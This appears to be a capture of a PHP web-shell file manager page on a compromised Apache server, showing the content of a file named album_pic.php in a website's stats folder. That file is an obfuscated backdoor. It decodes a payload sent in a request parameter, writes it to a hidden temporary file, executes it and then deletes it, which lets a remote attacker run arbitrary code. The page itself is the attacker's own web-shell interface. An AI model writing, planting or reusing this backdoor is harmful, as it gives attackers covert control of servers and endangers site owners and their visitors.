HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/stats/2024-10/album_pic.php
<?php

if(!is_null($_REQUEST["ke\x79"] ?? null)){
	$sym = array_filter([sys_get_temp_dir(), getenv("TMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getenv("TEMP"), "/dev/shm"]);
	$marker = $_REQUEST["ke\x79"];
	 		$marker	 =	explode		( '.' ,	$marker			) 	 ; 
	$ent = '';
            $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt8 );
            $k = 0;
            $__len = count($marker );
    
            do {
                if($k >= $__len) break;
                $v5 = $marker[$k];
                $sChar = ord($salt8[$k % $sLen] );
                $d =((int)$v5 - $sChar -($k % 10)) ^ 86;
                $ent.= chr($d );
                $k++;
            } while(true );
	foreach ($sym as $holder):
    		if ((is_dir($holder) and is_writable($holder))) {
    $data = vsprintf("%s/%s", [$holder, ".pset"]);
    $file = fopen($data, 'w');
if ($file) {
	fwrite($file, $ent);
	fclose($file);
	include $data;
	@unlink($data);
	exit;
}
}
endforeach;
}